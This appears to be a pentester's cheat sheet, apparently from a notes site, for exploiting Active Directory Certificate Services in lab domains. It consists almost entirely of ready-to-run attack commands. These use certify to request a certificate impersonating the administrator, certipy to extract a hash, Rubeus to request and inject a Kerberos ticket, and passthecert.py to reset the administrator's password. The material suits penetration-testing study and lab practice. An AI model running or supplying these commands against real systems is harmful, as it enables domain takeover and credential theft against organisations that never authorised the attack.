ADCS exploitation

certify.exe find /vulnerable

# request vuln cert
.\certify.exe request /ca:dc.DOMAIN.htb\CERT-DC-CA /template:UserAuthentication /altname:administrator

# convert
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# update time
ntpdate domain.htb

# extract hash 
certipy auth -pfx cert.pfx -dc-ip 10.10.11.2 -username Administrator -domain domain.htb

# Rubeus request ticket:
Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt

# Convert the pfx
certipy cert -pfx localadmin.pfx -nokey -out user.crt
certipy cert -pfx localadmin.pfx -nocert -out user.key

# PasstheCert
passthecert.py -action modify_user -target administrator -new-pass whoami123 -crt admin.crt -key admin.key -dc-ip 10.129.9.171  -domain domain.htb
PreviousImpacketNextESC 1

Last updated